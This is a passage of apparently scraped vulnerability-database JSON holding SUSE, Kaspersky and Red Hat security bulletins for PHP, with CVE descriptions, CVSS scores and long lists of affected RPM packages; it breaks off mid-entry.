vulnerability, as demonstrated by reading\n a private SSL key in an Apache HTTP Server web-hosting environment with\n mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as\n used in the Fileinfo component in PHP allowed remote attackers to cause\n a denial of service (assertion failure and application exit) via a\n crafted CDF file (bsc#884986).\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c\n in file as used in the Fileinfo component in PHP allowed remote\n attackers to cause a denial of service (application crash) via a crafted\n Pascal string in a FILE_PSTRING conversion (bsc#884987).\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as\n used in the Fileinfo component in PHP relies on incorrect sector-size\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF file\n (bsc#884989).\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in\n the Fileinfo component in PHP did not properly validate sector-count\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n - CVE-2014-3487: The cdf_read_property_info function in file as used in\n the Fileinfo component in PHP did not properly validate a stream offset,\n which allowed remote attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that\n certain data structures will have the array data type after\n unserialization, which allowed remote attackers to execute arbitrary\n code via a crafted string that triggers use of a Hashtable destructor,\n related to "type confusion" issues in (1) ArrayObject and (2)\n SPLObjectStorage (bsc#884992).\n\n These non-security issues were fixed:\n - bnc#935074: compare with SQL_NULL_DATA correctly\n - bnc#935074: fix segfault in odbc_fetch_array\n - bnc#919080: fix timezone map\n - bnc#925109: unserialize SoapClient type confusion\n\n", "reporter": "Suse", "published": "2016-06-21T13:08:17", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "Security update for php53 (important)", "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9767", "CVE-2016-4342", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-5161", "CVE-2015-3329", "CVE-2014-3478", "CVE-2016-4540", "CVE-2016-4538", "CVE-2015-4644", "CVE-2015-8879", "CVE-2015-1352", "CVE-2016-3185", "CVE-2016-4544", "CVE-2015-2301", "CVE-2014-3515", "CVE-2014-3479", "CVE-2015-8867", "CVE-2014-9709", "CVE-2014-4670", "CVE-2015-2305", "CVE-2016-4543", "CVE-2014-3668", "CVE-2015-0273", "CVE-2016-4542", "CVE-2016-4541", "CVE-2014-3480", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2014-0207", "CVE-2016-2554", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-8835", "CVE-2015-4021", "CVE-2014-3487", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-3152", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-6833", "CVE-2014-4721", "CVE-2016-4070", "CVE-2014-4698", "CVE-2015-8874", "CVE-2015-3411", "CVE-2015-4116", "CVE-2014-4049", "CVE-2015-6831", "CVE-2014-3670", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2016-4539", "CVE-2015-6837", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-4073", "CVE-2015-7803", "CVE-2014-5459", "CVE-2015-4603", "CVE-2015-4599", "CVE-2016-5096", "CVE-2015-4598", "CVE-2015-8866", "CVE-2015-5589", "CVE-2016-3141", "CVE-2015-4643", "CVE-2015-8838", "CVE-2016-4346", "CVE-2015-0231", "CVE-2016-5114", "CVE-2004-1019", "CVE-2016-3142", "CVE-2015-6838", "CVE-2016-4537"], "modified": "2016-06-21T13:08:17", "id": "SUSE-SU-2016:1638-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00041.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2018-09-13T06:47:11", "references": [], "description": "### *CVSS*:\n7.5\n\n### *Detect date*:\n03/30/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in PHP. Malicious users can exploit these vulnerabilities to inject or execute arbitrary code, bypass security restrictions or cause denial of service.\n\n### *Affected products*:\nPHP versions earlier than 5.4.39 \nPHP 5.5 versions earlier than 5.5.23 \nPHP 5.6 versions earlier than 5.6.7\n\n### *Solution*:\nUpdate to the latest version \n[Get PHP](<http://php.net/downloads.php>)\n\n### *Original advisories*:\n[PHP changelog](<http://php.net/ChangeLog-5.php>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[PHP](<https://threats.kaspersky.com/en/product/PHP/>)\n\n### *CVE-IDS*:\n[CVE-2015-2787](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2787>) \n[CVE-2015-2348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2348>) \n[CVE-2015-2331](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331>) \n[CVE-2015-2301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301>) \n[CVE-2015-1351](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351>) \n[CVE-2015-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273>) \n[CVE-2014-9709](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709>) \n[CVE-2014-9705](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705>) \n[CVE-2014-9653](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9653>) \n[CVE-2014-9652](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9652>)", "edition": 14, "reporter": "Kaspersky Lab", "published": "2015-03-30T00:00:00", "title": "\r KLA10514Multiple vulnerabilities in PHP and plugins ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-2331", "CVE-2014-9653", "CVE-2014-9652", "CVE-2015-1351"], "modified": "2018-09-10T00:00:00", "id": "KLA10514", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10514", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-06-13T00:00:11", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-debuginfo", "packageFilename": "php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "src", "packageName": "php55-php", "packageFilename": "php55-php-5.5.21-2.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-cli", "packageFilename": "php55-php-cli-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-soap", "packageFilename": "php55-php-soap-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-snmp", "packageFilename": "php55-php-snmp-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-xml", "packageFilename": "php55-php-xml-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-bcmath", "packageFilename": "php55-php-bcmath-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-intl", "packageFilename": "php55-php-intl-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-gd", "packageFilename": "php55-php-gd-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-opcache", "packageFilename": "php55-php-opcache-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-xmlrpc", "packageFilename": "php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-fpm", "packageFilename": "php55-php-fpm-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-dba", "packageFilename": "php55-php-dba-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-mysqlnd", "packageFilename": "php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-pspell", "packageFilename": "php55-php-pspell-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php", "packageFilename": "php55-php-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-pgsql", "packageFilename": "php55-php-pgsql-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-gmp", "packageFilename": "php55-php-gmp-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-enchant", "packageFilename": "php55-php-enchant-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-pdo", "packageFilename": "php55-php-pdo-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-common", "packageFilename": "php55-php-common-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-devel", "packageFilename": "php55-php-devel-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-odbc", "packageFilename": "php55-php-odbc-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-mbstring", "packageFilename": "php55-php-mbstring-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-recode", "packageFilename": "php55-php-recode-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-tidy", "packageFilename": "php55-php-tidy-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-imap", "packageFilename": "php55-php-imap-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-process", "packageFilename": "php55-php-process-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-2.el6", "arch": "x86_64", "packageName": "php55-php-ldap", "packageFilename": "php55-php-ldap-5.5.21-2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageName": "php55", "packageFilename": "php55-2.0-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageName": "php55-scldevel", "packageFilename": "php55-scldevel-2.0-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageName": "php55-runtime", "packageFilename": "php55-runtime-2.0-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "src", "packageName": "php55", "packageFilename": "php55-2.0-1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-debuginfo", "packageFilename": "php55-php-debuginfo-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "src", "packageName": "php55-php", "packageFilename": "php55-php-5.5.21-2.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-dba", "packageFilename": "php55-php-dba-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-odbc", "packageFilename": "php55-php-odbc-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-common", "packageFilename": "php55-php-common-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-pdo", "packageFilename": "php55-php-pdo-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-fpm", "packageFilename": "php55-php-fpm-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-recode", "packageFilename": "php55-php-recode-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-xml", "packageFilename": "php55-php-xml-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-pspell", "packageFilename": "php55-php-pspell-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php", "packageFilename": "php55-php-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-snmp", "packageFilename": "php55-php-snmp-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-soap", "packageFilename": "php55-php-soap-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-pgsql", "packageFilename": "php55-php-pgsql-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-gmp", "packageFilename": "php55-php-gmp-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageName": "php55-scldevel", "packageFilename": "php55-scldevel-2.0-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-bcmath", "packageFilename": "php55-php-bcmath-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-cli", "packageFilename": "php55-php-cli-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-intl", "packageFilename": "php55-php-intl-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-enchant", "packageFilename": "php55-php-enchant-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-mbstring", "packageFilename": "php55-php-mbstring-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-process", "packageFilename": "php55-php-process-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageName": "php55-runtime", "packageFilename": "php55-runtime-2.0-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageName": "php55", "packageFilename": "php55-2.0-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-xmlrpc", "packageFilename": "php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-gd", "packageFilename": "php55-php-gd-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-opcache", "packageFilename": "php55-php-opcache-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-devel", "packageFilename": "php55-php-devel-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-ldap", "packageFilename": "php55-php-ldap-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageName": "php55-php-mysqlnd", "packageFilename": "php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "src", "packageName": "php55", "packageFilename": "php55-2.0-1.el7.src.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. The php55 packages provide a recent stable release of PHP with\nthe PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a\nnumber of additional utilities.\n\nThe php55 packages have been upgraded to upstream version 5.5.21, which\nprovides multiple bug fixes over the version shipped in Red Hat Software\nCollections 1. (BZ#1057089)\n\nThe following security issues were fixed in the php55-php component:\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA heap buffer overflow flaw was found in PHP's regular expression\nextension. An attacker able to make PHP process a specially crafted regular\nexpression pattern could cause it to crash and possibly execute arbitrary\ncode. (CVE-2015-2305)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA use-after-free flaw was found in PHP's OPcache extension. This flaw could\npossibly lead to a disclosure of a portion of the server memory.\n(CVE-2015-1351)\n\nA use-after-free flaw was found in PHP's phar (PHP Archive) extension.\nAn attacker able to trigger certain error condition in phar archive\nprocessing could possibly use this flaw to disclose certain portions of\nserver memory. (CVE-2015-2301)\n\nAn ouf-of-bounds read flaw was found in the way the File Information\n(fileinfo) extension processed certain Pascal strings. A remote attacker\ncould cause a PHP application to crash if it used fileinfo to identify the\ntype of the attacker-supplied file. (CVE-2014-9652)\n\nIt was found that PHP move_uploaded_file() function did not properly handle\nfile names with a NULL character. A remote attacker could possibly use this\nflaw to make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348)\n\nA NULL pointer dereference flaw was found in PHP's pgsql extension. A\nspecially crafted table name passed to a function such as pg_insert() or\npg_select() could cause a PHP application to crash. (CVE-2015-1352)\n\nA flaw was found in the way PHP handled malformed source files when running\nin CGI mode. A specially crafted PHP file could cause PHP CGI to crash.\n(CVE-2014-9427)\n\nAll php55 users are advised to upgrade to these updated packages, which\ncorrect these issues. After installing the updated packages, the\nhttpd24-httpd service must be restarted for the update to take effect.\n", "reporter": "RedHat", "published": "2015-06-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1053) Moderate: php55 security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-8142", "CVE-2014-9427", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-1351", "CVE-2015-1352", "CVE-2015-2301", "CVE-2015-2305", "CVE-2015-2348", "CVE-2015-2787", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:18", "id": "RHSA-2015:1053", "href": "https://access.redhat.com/errata/RHSA-2015:1053", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T23:59:35", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "src", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-xml", "packageFilename": "php-xml-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-pspell", "packageFilename": "php-pspell-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-mysql", "packageFilename": "php-mysql-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-imap", "packageFilename": "php-imap-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-tidy", "packageFilename": "php-tidy-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-common", "packageFilename": "php-common-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-pdo", "packageFilename": "php-pdo-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-recode", "packageFilename": "php-recode-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-dba", "packageFilename": "php-dba-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-intl", "packageFilename": "php-intl-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-ldap", "packageFilename": "php-ldap-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-odbc", "packageFilename": "php-odbc-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-enchant", "packageFilename": "php-enchant-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-gd", "packageFilename": "php-gd-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-soap", "packageFilename": "php-soap-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-cli", "packageFilename": "php-cli-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-embedded", "packageFilename": "php-embedded-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-process", "packageFilename": "php-process-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-devel", "packageFilename": "php-devel-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": 